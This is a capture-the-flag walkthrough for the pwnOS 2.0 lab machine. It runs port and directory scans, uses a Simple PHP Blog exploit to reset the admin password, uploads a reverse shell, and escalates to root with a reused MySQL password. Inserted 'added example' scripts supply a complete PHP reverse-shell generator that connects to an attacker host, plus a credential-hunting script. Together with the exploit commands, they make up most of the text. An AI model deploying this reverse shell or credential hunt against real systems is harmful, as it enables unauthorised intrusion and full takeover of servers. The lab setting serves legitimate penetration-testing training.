PWNOS2.0 Walkthrough
Reconnaissance
Port Scanning
┌──(kali㉿kali)-[~]
└─$ nmap -A -sC -F 10.10.10.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 09:52 EDT
Nmap scan report for 10.10.10.100
Host is up (0.00032s latency).
Not shown: 98 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 85:d3:2b:01:09:42:7b:20:4e:30:03:6d:d1:8f:95:ff (DSA)
| 2048 30:7a:31:9a:1b:b8:17:e7:15:df:89:92:0e:cd:58:28 (RSA)
|_ 256 10:12:64:4b:7d:ff:6a:87:37:26:38:b1:44:9f:cf:5e (ECDSA)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
|_http-server-header: Apache/2.2.17 (Ubuntu)
|_http-title: Welcome to this Site!
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.77 seconds
Enumeration
HTTP Enumeration
Port 80 is open, so the next step is directory brute-forcing with dirb:
┌──(kali㉿kali)-[~]
└─$ dirb http://10.10.10.100 | grep "=="
==> DIRECTORY: http://10.10.10.100/blog/
==> DIRECTORY: http://10.10.10.100/includes/
==> DIRECTORY: http://10.10.10.100/blog/config/
==> DIRECTORY: http://10.10.10.100/blog/content/
==> DIRECTORY: http://10.10.10.100/blog/docs/
==> DIRECTORY: http://10.10.10.100/blog/flash/
==> DIRECTORY: http://10.10.10.100/blog/images/
==> DIRECTORY: http://10.10.10.100/blog/interface/
==> DIRECTORY: http://10.10.10.100/blog/languages/
==> DIRECTORY: http://10.10.10.100/blog/scripts/
==> DIRECTORY: http://10.10.10.100/blog/themes/
Browsing to http://10.10.10.100/blog shows a blog. Its page source identifies the application as Simple PHP Blog 0.4.0:
<meta name="generator" content="Simple PHP Blog 0.4.0" />
Searching searchsploit for that version returns several entries, including a "Multiple Remote Exploits" script (1191.pl) for 0.4.0:
┌──(kali㉿kali)-[~]
└─$ searchsploit simple PHP 0.4
Simple PHP Blog 0.4 - 'colors.php' Multiple Cross-Site Scripting Vulnerabilities | cgi/webapps/26463.txt
Simple PHP Blog 0.4 - 'preview_cgi.php' Multiple Cross-Site Scripting Vulnerabilities | cgi/webapps/26461.txt
Simple PHP Blog 0.4 - 'preview_static_cgi.php' Multiple Cross-Site Scripting Vulnerabilities | cgi/webapps/26462.txt
Simple PHP Blog 0.4.0 - Multiple Remote Exploits | php/webapps/1191.pl
Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit) | php/webapps/16883.rb
Simple PHP Blog 0.4.7.1 - Remote Command Execution | php/webapps/1581.pl
Exploitation
Run 1191.pl against the blog. Exploit 3 (Set New Username and Password) deletes and recreates config/password.txt without knowing the existing credentials, so the admin account is reset to admin/admin:
┌──(kali㉿kali)-[~]
└─$ perl 1191.pl -h http://10.10.10.100/blog -e 3 -U admin -P admin
________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit....
Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: admin
Password is set to: admin
*** Exploit Completed....
Have a nice day! :)
Log in with the credentials just set, then upload a PHP reverse shell through the blog's admin interface. Start a listener on the attacker machine and request the uploaded PHP file; the shell connects back as www-data:
┌──(kali㉿kali)-[~]
└─$ nc -lvp 1234
listening on [any] 1234 ...
10.10.10.100: inverse host lookup failed: Unknown host
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.100] 44078
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
20:00:24 up 4:22, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ whoami
www-data
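The upload step above does not show the payload itself. As an added example (not code from the original walkthrough), the script below writes a minimal PHP reverse shell that hands a connected socket to an interactive /bin/sh, and starts the nc listener when invoked with the attacker host and port. The LHOST/LPORT values, the output filename and the function names are this example's own assumptions; the file must still be uploaded by hand through the blog's admin interface.

```shell
#!/bin/sh
# Added example, not from the original post: generate a PHP reverse shell
# payload for upload and start the matching listener.

# Write a PHP file that connects back to LHOST:LPORT and attaches an
# interactive /bin/sh to the socket. Arguments: lhost lport output_path.
# Prints the path of the written file.
make_php_shell() {
    lhost="$1"; lport="$2"; out="$3"
    cat > "$out" <<EOF
<?php
// Connect back to the attacker; give the socket to an interactive /bin/sh as
// its stdin, stdout and stderr, and stay alive until the shell exits.
\$sock = fsockopen("$lhost", $lport);
if (!\$sock) { die("connect back failed"); }
\$proc = proc_open("/bin/sh -i", array(0 => \$sock, 1 => \$sock, 2 => \$sock), \$pipes);
if (!is_resource(\$proc)) { die("proc_open failed"); }
\$st = proc_get_status(\$proc);
while (\$st["running"]) { sleep(1); \$st = proc_get_status(\$proc); }
?>
EOF
    printf '%s\n' "$out"
}

# Listen for the connect-back (same nc invocation as in the walkthrough).
start_listener() {
    nc -lvp "$1"
}

# Usage: sh payload.sh 10.10.10.128 1234 [shell.php]
# Only runs when arguments are given, so the functions can be sourced alone.
if [ "$#" -ge 2 ]; then
    lhost="$1"; lport="$2"; out="${3:-shell.php}"
    make_php_shell "$lhost" "$lport" "$out" >/dev/null
    echo "wrote $out: upload it through the blog's admin interface, then request it"
    start_listener "$lport"
fi
```

After the shell arrives, upgrade it to a PTY exactly as the walkthrough does further down; the `can't access tty` line in the output above is the sign that `su` will not work until you do.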
Privilege Escalation
Looking around the filesystem, /var contains a file named mysqli_connect.php. Its contents:
$ cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php
// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.
// Set the database access information as constants:
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');
// Make the connection:
$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );
?>
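Finding that file by hand is the manual version of a routine credential hunt. As an added example (not part of the original walkthrough), the script below rebuilds a mysqli_connect.php like the one above as a constructed sample, extracts the DB_USER/DB_PASSWORD pair from every PHP file under a directory, and lists the local accounts with a real login shell that a found password should be tried against with su. The sample directory, the passwd file argument and the function names are this example's own.

```shell
#!/bin/sh
# Added example, not from the original post: hunt for database credentials in
# PHP config files and list the local users to test them against (password reuse).

# Constructed sample: a copy of the mysqli_connect.php pattern found under /var,
# plus one PHP file without credentials. Prints the temporary directory to scan.
setup_sample() {
    dir=$(mktemp -d)
    mkdir -p "$dir/www/blog"
    cat > "$dir/mysqli_connect.php" <<'EOF'
<?php # Script 8.2 - mysqli_connect.php
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');
?>
EOF
    printf '<?php echo "hello"; ?>\n' > "$dir/www/blog/index.php"
    printf '%s\n' "$dir"
}

# Print the quoted value of a DEFINE('NAME', '...') constant in a file.
# Arguments: constant_name file. Matches define/DEFINE with optional spaces.
define_value() {
    sed -nE "s/.*[dD][eE][fF][iI][nN][eE] *\( *'$1' *, *'([^']*)'.*/\1/p" "$2" | head -n 1
}

# Print file:user:password for every PHP file under $1 that defines DB_PASSWORD.
find_db_creds() {
    find "$1" -type f -name '*.php' -exec grep -l 'DB_PASSWORD' {} + 2>/dev/null |
    while IFS= read -r f; do
        printf '%s:%s:%s\n' "$f" "$(define_value DB_USER "$f")" "$(define_value DB_PASSWORD "$f")"
    done
}

# Local accounts whose shell is not nologin/false, read from a passwd file
# (defaults to /etc/passwd). These are the su targets for a recovered password.
login_users() {
    awk -F: '$7 !~ /(nologin|false)$/ { print $1 }' "${1:-/etc/passwd}"
}

# Usage: sh credhunt.sh /var   (scan a directory on the compromised host)
if [ "$#" -ge 1 ]; then
    find_db_creds "$1"
    echo "--- accounts to try the password against with su ---"
    login_users
fi
```

On the target this would be run as www-data against /var and /var/www; the walkthrough's next step, trying the MySQL password with `su root`, is exactly the password-reuse check the user list is for.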
The MySQL root password in that file is reused for the system root account. Upgrade the shell to a proper PTY first (su will not prompt for a password without a terminal), then switch to root with it:
# Spawn a proper interactive bash with Python's pty module so that su can prompt for the password
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@web:/var$ su root
su root
Password: root@ISIntS
root@web:/var# id
id
uid=0(root) gid=0(root) groups=0(root)
This post is licensed under CC BY 4.0 by the author.